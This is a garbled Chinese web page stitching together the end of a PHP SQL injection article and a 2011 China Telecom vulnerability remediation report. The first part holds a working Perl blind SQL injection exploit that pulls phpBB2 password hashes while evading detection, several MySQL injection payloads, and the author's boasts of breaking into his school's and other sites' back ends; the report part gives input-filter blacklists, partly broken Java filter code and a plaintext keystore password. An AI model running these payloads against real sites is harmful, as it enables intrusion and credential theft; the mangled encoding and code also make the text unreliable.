1“;Rick提供了下面的這斷測(cè)試代碼: use IO::Socket;$remote = shift || 'localhost';$view_topic = shift || '/phpBB2/viewtopic.php';$uid = shift || 2;$port = 80;$dbtype = 'mysql4';# mysql4 or pgsql print ”Trying to get password hash for uid $uid server $remote dbtype: $dbtypen“;$p = ”“;for($index=1;$index<=32;$index++){ $socket = IO::Socket::INET->new(PeerAddr => $remote, PeerPort => $port, Proto => ”tcp“, Type => SOCK_STREAM)or die ”Couldnt connect to $remote:$port : $@n“;$str = ”GET $view_topic“.”?sid=1&topic_id=-1“.random_encode(make_dbsql()).”&view=newest“.” HTTP/1.0nn“;print $socket $str;print $socket ”Cookie: phpBB2mysql_sid=1n“;# replace this for pgsql or remove it print $socket ”Host: $remotenn“;while($answer = <$socket>){ if($answer =~ /location:.*x23(d+)/)# Matches the location: viewtopic.php?p=<num>#<num> { $p.= chr($1);} } close($socket);} print ”nMD5 Hash for uid $uid is $pn“;# random encode str.helps avoid detection sub random_encode { $str = shift;$ret = ”“;for($i=0;$i<length($str);$i++){ $c = substr($str,$i,1);$j = rand length($str)* 1000;if(int($j)% 2 || $c eq ' '){ $ret.= ”%“.sprintf(”%x“,ord($c));} else { $ret.= $c;} } return $ret;} sub make_dbsql { if($dbtype eq 'mysql4'){ return ” union select ord(substring(user_password,“.$index.”,1))from phpbb_users where user_id=$uid/*“;} elsif($dbtype eq 'pgsql'){ return ”;select ascii(substring(user_password from $index for 1))as post_id from phpbb_posts p, phpbb_users u where u.user_id=$uid or false“;} else { return ”";} } 這斷代碼,我就不多做解釋了.作用是獲得HASH值.看到這里,大家可能有點(diǎn)疑問,為什么我前面講的那些改的函數(shù)怎么沒有用到,我講出來不怕大家笑話:其實(shí)網(wǎng)上很多站點(diǎn)有些頁面的查詢語句看起來會(huì)是這樣: display.php?sqlsave=select+*+from+aaa+where+xx=yy+order+by+bbb+desc 不要笑,這是真的,我還靠這個(gè)進(jìn)過幾個(gè)大型網(wǎng)站.至于哪一些,不好講出來,不過我們學(xué)校的網(wǎng)站,我就是靠這個(gè)進(jìn)后臺(tái)的(希望學(xué)校網(wǎng)絡(luò)中心的看不到這篇文章,^_^).把前面那函數(shù)用上吧.不然你只有改人家的密碼了哦!!差點(diǎn)忘了一點(diǎn),在SQL注入的時(shí)候,PHP與ASP有所不同,mysql對(duì)sql語句的運(yùn)用沒有mssql靈活,因此,很多在mssql上可以用的查詢語句在mysql數(shù)據(jù)庫中都不能奏效了.一般我們常見的注入語句像這樣:aaa.php?id=a' into outfile 'pass.txt或是aaa.php?id=a' into outfile 'pass.txt' /*再進(jìn)一步可以改成:aaa.php?id=a' or 1=1 union select id,name,password form users into outfile 'c:/a.txt 這樣可以將數(shù)據(jù)庫數(shù)據(jù)導(dǎo)出為文件,然后可以查看.或是這樣:mode=',user_level='4 這個(gè)語句一般用在修改資料時(shí),假設(shè)頁面存在漏洞的話,就可以達(dá)到提升權(quán)限的做用.其它的如' OR 1=1--或者:1' or 1='1則跟asp差不多.這里不多講了.在php里面,SQL注入看來還是漏洞之首啊,有太多的頁面存在這個(gè)問題了.其實(shí)大家可以看出來,上面那些分類歸根結(jié)底只有一個(gè)原因:提交參數(shù)沒過濾或是過濾不夠嚴(yán)謹(jǐn).黑客防線向來有攻有守.這里,就大致講一下防范的方法吧.首先,我個(gè)人認(rèn)為最重要的一點(diǎn)是將magic_quotes_gpc高為ON,它的作用是將單引號(hào),雙引號(hào),反斜線,和空字符轉(zhuǎn)換為含有反斜線的字符,如select * from admin where username='$username' and password='$password'語句,攻擊者想用1' or 1='1跳過驗(yàn)證,但是,那些字符串將被轉(zhuǎn)換成這樣:select * from admin where username='a' and password='1' or 1='1'從而達(dá)到阻止注入的目的,事實(shí)也就是自動(dòng)進(jìn)行了addslashes()操作.再不行的話,自己定義函數(shù)處理吧.現(xiàn)在看來,那些搞PHP注入的人也比較郁悶,因?yàn)閙yslq4以下版本不支持子語句,而新版本的mysql又會(huì)將magic_quotes_gpc選項(xiàng)默認(rèn)為開.解決包含文件漏洞用的方法就是:要求程序員包含文件里的參數(shù)盡量不要使用變量,如果使用變量,就一定要嚴(yán)格檢查要包含的文件名,絕對(duì)不能由偉創(chuàng)電腦維修用戶任意指定,建議設(shè)global_variables為off。如前面文件打開中限制PHP操作路徑是一個(gè)必要的選項(xiàng)。另外,如非特殊需要,一定要關(guān)閉PHP的遠(yuǎn)程文件打開功能。修改php.ini文件:allow_url_fopen = Off(注:參見<<p>>).還有一點(diǎn)我覺得很多網(wǎng)站都會(huì)有這個(gè)問題,就是沒有關(guān)錯(cuò)誤顯示.輕一看可能沒什么,但是一些盯了很久(用詞有點(diǎn)不對(duì)哦)的人就可以通過錯(cuò)誤提示來獲得如數(shù)據(jù)庫信息,網(wǎng)頁文件物理路徑等等.以上都是我個(gè)人的一些觀點(diǎn),如果你有什么看法,可以與我們聯(lián)系,大家在一起討論吧。</p><h2><a name="5" >第五篇:javaWeb安全驗(yàn)證漏洞修復(fù)總結(jié)</a></h2><p>EMA服務(wù)管理平臺(tái)二期擴(kuò)容安全驗(yàn)收</p><p>漏洞修復(fù)總結(jié)</p><p>2011年5月</p><p>中國(guó)電信EMA服務(wù)管理平臺(tái)二期擴(kuò)容安全驗(yàn)收漏洞修復(fù)總結(jié)</p><p>目 錄 2 WEB安全介紹..........................................................................................................................1 SQL注入、盲注.......................................................................................................................1 2.1 SQL注入、盲注概述.................................................................................................................1 2.2 2.4 3 安全風(fēng)險(xiǎn)及原因...................................................................................................................2 應(yīng)用程序解決方案...............................................................................................................4 2.3 APPSCAN掃描建議......................................................................................................................2</p><p>會(huì)話標(biāo)識(shí)未更新.......................................................................................................................7 3.1 3.2 3.4 會(huì)話標(biāo)識(shí)未更新概述...........................................................................................................7 安全風(fēng)險(xiǎn)及原因分析...........................................................................................................8 應(yīng)用程序解決方案...............................................................................................................8 3.3 APPSCAN掃描建議......................................................................................................................8 已解密登錄請(qǐng)求.......................................................................................................................9 4.1 4.2 4.4 已解密登錄請(qǐng)求概述...........................................................................................................9 安全風(fēng)險(xiǎn)及原因分析...........................................................................................................9 應(yīng)用程序解決方案...............................................................................................................9 4.3 APPSCAN掃描建議......................................................................................................................9 跨站點(diǎn)請(qǐng)求偽造.....................................................................................................................11 5.1 5.2 5.4 跨站點(diǎn)請(qǐng)求偽造概述.........................................................................................................11 安全風(fēng)險(xiǎn)及原因分析.........................................................................................................12 應(yīng)用程序解決方案.............................................................................................................13 5.3 APPSCAN掃描建議....................................................................................................................13 不充分賬戶封鎖.....................................................................................................................13 6.1 6.2 6.4 不充分賬戶封鎖概述.........................................................................................................13 安全風(fēng)險(xiǎn)及原因分析.........................................................................................................13 應(yīng)用程序解決方案.............................................................................................................14 6.3 APPSCAN掃描建議....................................................................................................................14 啟用不安全HTTP方法...........................................................................................................14 7.1 7.2 7.4 啟用不安全HTTP方法概述...............................................................................................14 安全風(fēng)險(xiǎn)及原因分析.........................................................................................................15 應(yīng)用程序解決方案.............................................................................................................15 7.3 APPSCAN掃描建議....................................................................................................................15 HTTP注釋敏感信息...............................................................................................................16 8.1 HTTP注釋敏感信息概述........................................................................................................16 8.2 8.4 安全風(fēng)險(xiǎn)及原因分析.........................................................................................................16 應(yīng)用程序解決方案.............................................................................................................17 8.3 APPSCAN掃描建議....................................................................................................................16 發(fā)現(xiàn)電子郵件地址模式.........................................................................................................17</p><p>中國(guó)電信EMA服務(wù)管理平臺(tái)二期擴(kuò)容安全驗(yàn)收漏洞修復(fù)總結(jié)</p><p>9.1 9.2 9.4 10 發(fā)現(xiàn)電子郵件地址模式概述.............................................................................................17 安全風(fēng)險(xiǎn)及原因分析.........................................................................................................17 應(yīng)用程序解決方案.............................................................................................................17 9.3 APPSCAN掃描建議....................................................................................................................17</p><p>通過框架釣魚.........................................................................................................................20</p><p>通過框架釣魚概述.............................................................................................................20 安全風(fēng)險(xiǎn)及原因分析.........................................................................................................20 APPSCAN掃描建議...............................................................................................................21 應(yīng)用程序解決方案.............................................................................................................23 10.1 10.2 10.3 10.4 11 檢查到文件替代版本.............................................................................................................25</p><p>檢查到文件替代版本概述.................................................................................................25 安全風(fēng)險(xiǎn)及原因分析.........................................................................................................26 APPSCAN掃描建議...............................................................................................................26 應(yīng)用程序解決方案.............................................................................................................26 11.1 11.2 11.3 11.4</p><p>中國(guó)電信EMA服務(wù)管理平臺(tái)二期擴(kuò)容安全驗(yàn)收漏洞修復(fù)總結(jié) Web安全介紹</p><p>目前很多業(yè)務(wù)都依賴于互聯(lián)網(wǎng),例如說網(wǎng)上銀行、網(wǎng)絡(luò)購物、網(wǎng)游等,很多惡意攻擊者出于不良的目的對(duì)Web 服務(wù)器進(jìn)行攻擊,想方設(shè)法通過各種手段獲取他人的個(gè)人賬戶信息謀取利益。正是因?yàn)檫@樣,Web業(yè)務(wù)平臺(tái)最容易遭受攻擊。同時(shí),對(duì)Web服務(wù)器的攻擊也可以說是形形色色、種類繁多,常見的有掛馬、SQL注入、緩沖區(qū)溢出、嗅探、利用IIS等針對(duì)Webserver漏洞進(jìn)行攻擊。</p><p>一方面,由于TCP/IP的設(shè)計(jì)是沒有考慮安全問題的,這使得在網(wǎng)絡(luò)上傳輸?shù)臄?shù)據(jù)是沒有任何安全防護(hù)的。攻擊者可以利用系統(tǒng)漏洞造成系統(tǒng)進(jìn)程緩沖區(qū)溢出,攻擊者可能獲得或者提升自己在有漏洞的系統(tǒng)上的用戶權(quán)限來運(yùn)行任意程序,甚至安裝和運(yùn)行惡意代碼,竊取機(jī)密數(shù)據(jù)。而應(yīng)用層面的軟件在開發(fā)過程中也沒有過多考慮到安全的問題,這使得程序本身存在很多漏洞,諸如緩沖區(qū)溢出、SQL注入等等流行的應(yīng)用層攻擊,這些均屬于在軟件研發(fā)過程中疏忽了對(duì)安全的考慮所致。</p><p>另一方面,用戶對(duì)某些隱秘的東西帶有強(qiáng)烈的好奇心,一些利用木馬或病毒程序進(jìn)行攻擊的攻擊者,往往就利用了用戶的這種好奇心理,將木馬或病毒程序捆綁在一些艷麗的圖片、音視頻及免費(fèi)軟件等文件中,然后把這些文件置于某些網(wǎng)站當(dāng)中,再引誘用戶去單擊或下載運(yùn)行?;蛘咄ㄟ^電子郵件附件和QQ、MSN等即時(shí)聊天軟件,將這些捆綁了木馬或病毒的文件發(fā)送給用戶,利用用戶的好奇心理引誘用戶打開或運(yùn)行這些文件、SQL注入、盲注 2.1 SQL注入、盲注概述</p><p>Web 應(yīng)用程序通常在后端使用數(shù)據(jù)庫,以與企業(yè)數(shù)據(jù)倉庫交互。查詢數(shù)據(jù)庫事實(shí)上的標(biāo)準(zhǔn)語言是 SQL(各大數(shù)據(jù)庫供應(yīng)商都有自己的不同版本)。Web 應(yīng)用程序通常會(huì)獲取用戶輸入(取自 HTTP 請(qǐng)求),將它并入 SQL 查詢中,然后發(fā)送到后端數(shù)據(jù)庫。接著應(yīng)用程序便處理查詢結(jié)果,有時(shí)會(huì)向用戶顯示結(jié)果。如果應(yīng)用程序?qū)τ脩簦ü粽撸┑妮斎胩幚聿粔蛐⌒模粽弑憧梢岳眠@種操作方式。在此情況下,攻擊者可以注入惡意的數(shù)據(jù),當(dāng)該數(shù)據(jù)并入 SQL 查詢中時(shí),就將查詢的原始語法更改得面目全非。例如,如果應(yīng)用程序使用用戶的輸入(如用戶名和密碼)來查詢用戶帳戶的數(shù)據(jù)庫表,以認(rèn)證用戶,而攻擊者能夠?qū)阂鈹?shù)據(jù)注入查詢的用戶名部分(和/或密碼部分),查詢便可能更改成 中國(guó)電信EMA服務(wù)管理平臺(tái)二期擴(kuò)容安全驗(yàn)收漏洞修復(fù)總結(jié)</p><p>完全不同的數(shù)據(jù)復(fù)制查詢,可能是修改數(shù)據(jù)庫的查詢,或在數(shù)據(jù)庫服務(wù)器上運(yùn)行 Shell 命令的查詢。2.2 安全風(fēng)險(xiǎn)及原因</p><p>高風(fēng)險(xiǎn)漏洞,攻擊者可能會(huì)查看、修改或刪除數(shù)據(jù)庫條目和表</p><p>原因:未對(duì)用戶輸入正確執(zhí)行危險(xiǎn)字符清理</p><p>2.3 AppScan掃描建議</p><p>若干問題的補(bǔ)救方法在于對(duì)用戶輸入進(jìn)行清理。通過驗(yàn)證用戶輸入未包含危險(xiǎn)字符,便可能防止惡意的用戶導(dǎo)致應(yīng)用程序執(zhí)行計(jì)劃外的任務(wù),例如:?jiǎn)?dòng)任意 SQL 查詢、嵌入將在客戶端執(zhí)行的 Javascript 代碼、運(yùn)行各種操作系統(tǒng)命令,等等。建議過濾出所有以下字符: [1] |(豎線符號(hào))[2] &(& 符號(hào))[3];(分號(hào))</p><p>[4] $(美元符號(hào))[5] %(百分比符號(hào))[6] @(at 符號(hào))[7] '(單引號(hào))[8] “(引號(hào))</p><p>[9] '(反斜杠轉(zhuǎn)義單引號(hào))[10] ”(反斜杠轉(zhuǎn)義引號(hào))[11] <>(尖括號(hào))[12]()(括號(hào))[13] +(加號(hào))</p><p>[14] CR(回車符,ASCII 0x0d)[15] LF(換行,ASCII 0x0a)[16] ,(逗號(hào))[17](反斜杠)</p><p>以下部分描述各種問題、問題的修訂建議以及可能觸發(fā)這些問題的危險(xiǎn)字符: SQL 注入和 SQL 盲注:</p><p>A.確保用戶輸入的值和類型(如 Integer、Date 等)有效,且符合應(yīng)用程序預(yù)期。</p><p>B.利用存儲(chǔ)過程,將數(shù)據(jù)訪問抽象化,讓用戶不直接訪問表或視圖。當(dāng)使用存儲(chǔ)過程時(shí),請(qǐng)利用 ADO 命令對(duì)象來實(shí)施它們,以強(qiáng)化變量類型。C.清理輸入以排除上下文更改符號(hào),例如: [1] '(單引號(hào))[2] “(引號(hào))</p><p>[3] '(反斜線轉(zhuǎn)義單引號(hào))中國(guó)電信EMA服務(wù)管理平臺(tái)二期擴(kuò)容安全驗(yàn)收漏洞修復(fù)總結(jié)</p><p>[4] ”(反斜杠轉(zhuǎn)義引號(hào))[5])(結(jié)束括號(hào))[6];(分號(hào))跨站點(diǎn)腳本編制:</p><p>A.清理用戶輸入,并過濾出 JavaScript 代碼。我們建議您過濾下列字符: [1] <>(尖括號(hào))[2] “(引號(hào))[3] '(單引號(hào))[4] %(百分比符號(hào))[5];(分號(hào))[6]()(括號(hào))[7] &(& 符號(hào))[8] +(加號(hào))</p><p>B.如果要修訂 <%00script> 變體,請(qǐng)參閱 MS 文章 821349 C.對(duì)于 UTF-7 攻擊: [-] 可能的話,建議您施行特定字符集編碼(使用 'Content-Type' 頭或 <meta> 標(biāo)記)。</p><p>HTTP 響應(yīng)分割:清理用戶輸入(至少是稍后嵌入在 HTTP 響應(yīng)中的輸入)。請(qǐng)確保輸入未包含惡意的字符,例如: [1] CR(回車符,ASCII 0x0d)[2] LF(換行,ASCII 0x0a)遠(yuǎn)程命令執(zhí)行:清理輸入以排除對(duì)執(zhí)行操作系統(tǒng)命令有意義的符號(hào),例如: [1] |(豎線符號(hào))[2] &(& 符號(hào))[3];(分號(hào))</p><p>執(zhí)行 shell 命令:</p><p>A.絕不將未檢查的用戶輸入傳遞給 eval()、open()、sysopen()、system()之類的 Perl 命令。</p><p>B.確保輸入未包含惡意的字符,例如: [1] $(美元符號(hào))[2] %(百分比符號(hào))[3] @(at 符號(hào))</p><p>XPath 注入:清理輸入以排除上下文更改符號(hào),例如: [1] '(單引號(hào))[2] ”(引號(hào))等 LDAP 注入:</p><p>A.使用正面驗(yàn)證。字母數(shù)字過濾(A..Z,a..z,0..9)適合大部分 LDAP 查詢。B.應(yīng)該過濾出或進(jìn)行轉(zhuǎn)義的特殊 LDAP 字符: [1] 在字符串開頭的空格或“#”字符 [2] 在字符串結(jié)尾的空格字符 [3] ,(逗號(hào))[4] +(加號(hào))[5] “(引號(hào))[6](反斜杠)[7] <>(尖括號(hào))中國(guó)電信EMA服務(wù)管理平臺(tái)二期擴(kuò)容安全驗(yàn)收漏洞修復(fù)總結(jié)</p><p>[8];(分號(hào))[9]()(括號(hào))MX 注入:</p><p>應(yīng)該過濾出特殊 MX 字符: [1] CR(回車符,ASCII 0x0d)</p><p>[2] LF(換行,ASCII 0x0a)記錄偽造: 應(yīng)該過濾出特殊記錄字符: [1] CR(回車符,ASCII 0x0d)[2] LF(換行,ASCII 0x0a)[3] BS(退格,ASCII 0x08)ORM 注入:</p><p>A.確保用戶輸入的值和類型(如 Integer、Date 等)有效,且符合應(yīng)用程序預(yù)期。</p><p>B.利用存儲(chǔ)過程,將數(shù)據(jù)訪問抽象化,讓用戶不直接訪問表或視圖。C.使用參數(shù)化查詢 API D.清理輸入以排除上下文更改符號(hào),例如:(*): [1] '(單引號(hào))[2] ”(引號(hào))</p><p>[3] '(反斜線轉(zhuǎn)義單引號(hào))[4] “(反斜杠轉(zhuǎn)義引號(hào))[5])(結(jié)束括號(hào))[6];(分號(hào))2.4 應(yīng)用程序解決方案</p><p>1、我們?yōu)榱苏{(diào)試方便,在頁面上會(huì)拋出數(shù)據(jù)庫異常信息,如果入侵工具獲取了這些信息,就可以獲取系統(tǒng)的一些配置信息,如web系統(tǒng)框架、采用的數(shù)據(jù)庫等,從而找出系統(tǒng)漏洞。所以不要在頁面上拋出異常的詳細(xì)信息,這些信息對(duì)客戶并沒有用,只是方便技術(shù)人員調(diào)試罷了,處理方法是在異常處理頁面把打印異常代碼刪除即可;</p><p>2、新建一個(gè)過濾器,通過過濾器過濾SQL注入特殊字符,配置成功后,重啟服務(wù),用Appsan工具掃描,漏洞得到解決,通過過濾器可以解決SQL注入、跨站點(diǎn)腳本編制及通過框架釣魚等問題,具體實(shí)現(xiàn)方式如下:</p><p>1、在web.xml文件中配置過濾器</p><p><filter-mapping> <filter-name>requestEncodingFilter</filter-name> <url-pattern>/*</url-pattern> </filter-mapping> <filter-name>InjectFilter</filter-name> <filter> <filter-class>com.sitech.ismp.util.context.InjectFilter</filter-c</filter> lass> 中國(guó)電信EMA服務(wù)管理平臺(tái)二期擴(kuò)容安全驗(yàn)收漏洞修復(fù)總結(jié)</p><p>2、過濾器過濾代碼</p><p>public class InjectFilter extends IsmpServletFilter {</p><p>private String failPage = ”/loginout.jsp“;//發(fā)生注入時(shí),跳轉(zhuǎn)頁面</p><p>public void doFilter(ServletRequest request,ServletResponse response,F(xiàn)ilterChain filterchain)throws IOException, ServletException { //判斷是否有注入攻擊字符</p><p>HttpServletRequest req =(HttpServletRequest)request;</p><p>String inj = injectInput(req);if(!inj.equals(”“)){ request.getRequestDispatcher(failPage).forward(request, return;response);} else { // 傳遞控制到下一個(gè)過濾器</p><p>filterchain.doFilter(request, response);} } /** * 判斷request中是否含有注入攻擊字符 * @param request * @return */ public String injectInput(ServletRequest request){</p><p>Enumeration e = request.getParameterNames();String attributeName;String attributeValues[];String inj = ”“;</p><p>while(e.hasMoreElements()){ attributeName =(String)e.nextElement();//不對(duì)密碼信息進(jìn)行過濾,一般密碼中可以包含特殊字符</p><p>if(attributeName.equals(”userPassword“)||attributeName.equals(”co</p><p>||attributeName.equals(“password”)||attributeName.equals(“PASSWOR continue;nfirmPassword”)||attributeName.equals(“PASSWORD”)D2“)||attributeName.equals(”valiPassword“)){ 5 中國(guó)電信EMA服務(wù)管理平臺(tái)二期擴(kuò)容安全驗(yàn)收漏洞修復(fù)總結(jié)</p><p>}</p><p>attributeValues = request.getParameterValues(attributeName);</p><p>for(int i = 0;i < attributeValues.length;i++){</p><p>if(attributeValues[i]==null||attributeValues[i].equals(”“))</p><p>continue;</p><p>inj = injectChar(attributeValues[i]);</p><p>if(!inj.equals(”“)){</p><p>return inj;</p><p>}</p><p>} } return inj;} /** * 判斷字符串中是否含有注入攻擊字符 * @param str * @return */ public String injectChar(String str){</p><p>String inj_str = ”“)' * %”;String inj_stra[] = inj_str.split(“ ”);</p><p>for(int i = 0;i < inj_stra.length;i++){ if(str.indexOf(inj_stra[i])>=0){ return inj_stra[i];} } return “";}</p><p>}</p><p> 中國(guó)電信EMA服務(wù)管理平臺(tái)二期擴(kuò)容安全驗(yàn)收漏洞修復(fù)總結(jié) 會(huì)話標(biāo)識(shí)未更新 3.1 會(huì)話標(biāo)識(shí)未更新概述</p><p>“會(huì)話固定”是一種攻擊技術(shù),會(huì)強(qiáng)制用戶的會(huì)話標(biāo)識(shí)變成顯式值。固定會(huì)話標(biāo)識(shí)值的技術(shù)有許多種,會(huì)隨著目標(biāo) Web 站點(diǎn)的功能而不同。從利用“跨站點(diǎn)腳本編制”到向 Web 站點(diǎn)密集發(fā)出先前生成的 HTTP 請(qǐng)求,都在這些技術(shù)范圍內(nèi)。用戶的會(huì)話標(biāo)識(shí)固定之后,攻擊者會(huì)等待用戶登錄,然后利用預(yù)定義的會(huì)話標(biāo)識(shí)值來假定用戶的聯(lián)機(jī)身份。</p><p>一般而言,對(duì)于標(biāo)識(shí)值的會(huì)話管理系統(tǒng)有兩種類型。第一種類型是“寬容”系統(tǒng),可讓 Web 瀏覽器指定任何標(biāo)識(shí)。第二種類型是“嚴(yán)格”系統(tǒng),只接受服務(wù)器端生成的值。當(dāng)使用寬容系統(tǒng)時(shí),不需要聯(lián)系 Web 站點(diǎn),便可以維護(hù)任何會(huì)話標(biāo)識(shí)。在嚴(yán)格系統(tǒng)中,攻擊者需要維護(hù)“陷阱會(huì)話”并且必須定期聯(lián)系 Web 站點(diǎn),才能防止閑置超時(shí)。對(duì)于會(huì)話固定,倘若沒有活動(dòng)保護(hù),使用會(huì)話來識(shí)別已認(rèn)證的用戶的任何 Web 站點(diǎn)都可能受到攻擊。使用會(huì)話標(biāo)識(shí)的 Web 站點(diǎn)通常都是基于 cookie 的站點(diǎn),但也會(huì)使用 URL 和隱藏的表單字段。不幸的是,基于 cookie 的會(huì)話最容易受到攻擊。目前已識(shí)別的大多數(shù)攻擊方法都是針對(duì) cookie 的固定。相對(duì)于在用戶登錄 Web 站點(diǎn)之后,再竊取用戶的會(huì)話標(biāo)識(shí),會(huì)話固定提供的機(jī)會(huì)多得多。</p><p>在用戶登錄之前,攻擊的活動(dòng)部分便已啟動(dòng)。</p><p>會(huì)話固定攻擊過程通常由三個(gè)步驟組成:</p><p>1)安裝會(huì)話</p><p>攻擊者針對(duì)目標(biāo) Web 站點(diǎn)設(shè)下“陷阱會(huì)話”,并獲取這個(gè)會(huì)話的標(biāo)識(shí),攻擊者也可以選擇攻擊中所用的任意會(huì)話標(biāo)識(shí)。在某些情況下,必須反復(fù)聯(lián)系 Web 站點(diǎn),才能維護(hù)確定好的陷阱會(huì)話值。</p><p>2)固定會(huì)話</p><p>攻擊者將陷阱會(huì)話值引進(jìn)用戶的瀏覽器中,固定用戶的會(huì)話標(biāo)識(shí)。</p><p>3)進(jìn)入會(huì)話</p><p>用戶登錄目標(biāo) Web 站點(diǎn)之后,當(dāng)使用固定會(huì)話標(biāo)識(shí)值時(shí),攻擊者便可加以接管?!?/p><p>修改</p><p>對(duì)于這類問題解決方案為在用戶進(jìn)入登錄頁面時(shí)清空session讓cookie過期</p><p>request.getSession(true).invalidate();//清空session Cookie cookie = request.getCookies()[0];//獲取cookie cookie.setMaxAge(0);//讓cookie過期</p><p>另外一種方式利用JSP的一些特性,不讓登錄頁面產(chǎn)生Session <% page session=”false” %> 中國(guó)電信EMA服務(wù)管理平臺(tái)二期擴(kuò)容安全驗(yàn)收漏洞修復(fù)總結(jié)</p><p>3.2 安全風(fēng)險(xiǎn)及原因分析</p><p>高風(fēng)險(xiǎn)漏洞,可能會(huì)竊取或操縱客戶會(huì)話和 cookie,它們可能用于模仿合法用戶,從而使黑客能夠以該用戶身份查看或變更用戶記錄以及執(zhí)行事務(wù)</p><p>原因:Web 應(yīng)用程序編程或配置不安全</p><p>3.3 AppScan掃描建議</p><p>始終生成新的會(huì)話,供用戶成功認(rèn)證時(shí)登錄。防止用戶操縱會(huì)話標(biāo)識(shí)。</p><p>請(qǐng)勿接受用戶瀏覽器登錄時(shí)所提供的會(huì)話標(biāo)識(shí)</p><p>3.4 應(yīng)用程序解決方案</p><p>會(huì)話標(biāo)識(shí)未更新,Appscan給出的描述是建議用戶每次登錄時(shí)需使用新的會(huì)話標(biāo)識(shí)。應(yīng)用程序?qū)崿F(xiàn)上就是在登錄模塊,添加以下代碼,即用戶登錄后,重新生成會(huì)話。</p><p>HttpSession session = request.getSession(false);if(session!=null){ //讓cookie過期</p><p>session.invalidate();</p><p>Cookie cookie = request.getCookies()[0];//獲取cookie</p><p>cookie.setMaxAge(0);//讓cookie過期 } request.getSession(true);//生成新會(huì)話</p><p>經(jīng)過測(cè)試,這段代碼只在weblogic和tomcat下才有效,在公司中間件webspeed及jboss6.0下問題都依然存在,但從掃描的結(jié)果信息分析看,漏洞已經(jīng)解決,分析判斷應(yīng)該只是session處理機(jī)制不同,AppScan工具仍認(rèn)為存在漏洞風(fēng)險(xiǎn)。在與電信溝通中我們存在一個(gè)經(jīng)驗(yàn)教訓(xùn)大家一定要吸取,不能過渡迷信流行的自動(dòng)化測(cè)試工具,尤其是對(duì)于Appscan這種判斷防御行為的復(fù)雜軟件,僅靠有限的規(guī)則設(shè)置就當(dāng)做是web安全的唯一標(biāo)準(zhǔn)這顯然不太合理,這種情況一定要與測(cè)試方溝通解釋。</p><p>另一方面,對(duì)于公司的產(chǎn)品webspeed,也想提點(diǎn)建議,商務(wù)項(xiàng)目采用公司的產(chǎn)品為公司節(jié)約了不少成本,但是我們產(chǎn)品后續(xù)升級(jí)維護(hù)也必須重視起來,當(dāng)確認(rèn)出是webspeed本身問題后,聯(lián)系vasg相關(guān)人員進(jìn)行協(xié)調(diào)解決,根本沒有非常了解該產(chǎn)品技術(shù)人員支持,只是一個(gè)剛?cè)肼毜耐略谂浜蠝y(cè)試。調(diào)試了一周時(shí)間仍不能解決,最后只能作為一個(gè)遺留問題擱置。公司一直在向產(chǎn)品化轉(zhuǎn)變,但是自身的產(chǎn)品維護(hù)、升級(jí)、管理仍然需要改進(jìn)。</p><p> 中國(guó)電信EMA服務(wù)管理平臺(tái)二期擴(kuò)容安全驗(yàn)收漏洞修復(fù)總結(jié) 已解密登錄請(qǐng)求 4.1 已解密登錄請(qǐng)求概述</p><p>在應(yīng)用程序測(cè)試過程中,檢測(cè)到將未加密的登錄請(qǐng)求發(fā)送到服務(wù)器。由于登錄過程所用的部分輸入字段(例如:用戶名、密碼、電子郵件地址、社會(huì)保險(xiǎn)號(hào)碼,等等)是個(gè)人敏感信息,建議通過加密連接(如 SSL)將其發(fā)送到服務(wù)器。任何以明文傳給服務(wù)器的信息都可能被竊,稍后可用來電子欺騙身份或偽裝用戶。此外,若干隱私權(quán)法規(guī)指出,用戶憑證之類的敏感信息一律以加密方式傳給網(wǎng)站。</p><p>4.2 安全風(fēng)險(xiǎn)及原因分析</p><p>安全風(fēng)險(xiǎn)中,可能會(huì)竊取諸如用戶名和密碼等未經(jīng)加密即發(fā)送了的用戶登錄信息</p><p>原因:諸如用戶名、密碼和信用卡號(hào)之類的敏感輸入字段未經(jīng)加密即進(jìn)行了傳 遞</p><p>4.3 AppScan掃描建議</p><p>1.確保所有登錄請(qǐng)求都以加密方式發(fā)送到服務(wù)器。2.請(qǐng)確保敏感信息,例如:密碼</p><p>-社會(huì)保險(xiǎn)號(hào)碼駕照號(hào)碼</p><p>-電子郵件地址郵政編碼</p><p>一律以加密方式傳給服務(wù)器。4.4 應(yīng)用程序解決方案</p><p>已解密的登錄請(qǐng)求,要求就是數(shù)據(jù)要加密傳輸。最簡(jiǎn)單有效的解決方式采用SSL加密協(xié)議傳輸,但是由于EMA服務(wù)管理平臺(tái)業(yè)務(wù)的特殊性,采用SSL加密方式對(duì)現(xiàn)有的業(yè)務(wù)影響太大,所以最終沒有采用此種方式解決該問題,但個(gè)人在進(jìn)行測(cè)試過程中也嘗試在tomcat和jboss下SSL方式配置,寫下來供參考。</p><p> 中國(guó)電信EMA服務(wù)管理平臺(tái)二期擴(kuò)容安全驗(yàn)收漏洞修復(fù)總結(jié)</p><p>Jboss內(nèi)核也是tomcat,所以兩者配置基本都是一樣,都是在生成證書文件后,在service.xml 進(jìn)行配置:</p><p>1.進(jìn)入到cmd 進(jìn)入到j(luò)dk bin目錄下執(zhí)行keytool-genkey-alias tomcat-keyalg RSA-keystore webspeed.keystore 生成證書 2.在service.xml配置SSL <Connector port=”8443“ maxHttpHeaderSize=”8192“ maxThreads=”150“ minSpareThreads=”25“ maxSpareThreads=”75“ enableLookups=”false“ disableUploadTimeout=”true“ acceptCount=”100“ scheme=”https“ secure=”true“ clientAuth=”false“ sslProtocol=”TLS“</p><p>keystoreFile=”C:tomcat-5.5.26confwebspeed.keystore“ keystorePass=”1111aaaa“/> 這樣配置后雖然可以通過https訪問,但仍然還可以通過8080使用普通的http訪問,所以還必須禁止普通模式登錄。所以還得在web.xml添加配置。01 <security-constraint> 02 03 <!--Authorization setting for SSL--> 04 05 <web-resource-collection > 06 07 <web-resource-name >SSL</web-resource-name> 08 09 <url-pattern>*.jsp</url-pattern> 10 11 <url-pattern>*.action</url-pattern> 12 13 </web-resource-collection> 14 15 <user-data-constraint> 16 17 <transport-guarantee>CONFIDENTIAL</transport-guarantee> 18 19 </user-data-constraint> 20 中國(guó)電信EMA服務(wù)管理平臺(tái)二期擴(kuò)容安全驗(yàn)收漏洞修復(fù)總結(jié) </security-constraint> 22 23 <login-config> 24 25 <!--Authorization setting for SSL--> 26 27 <auth-method>CLIENT-CERT</auth-method> 28 29 <realm-name>Client Cert Users-only Area</realm-name> 30 31 </login-config> 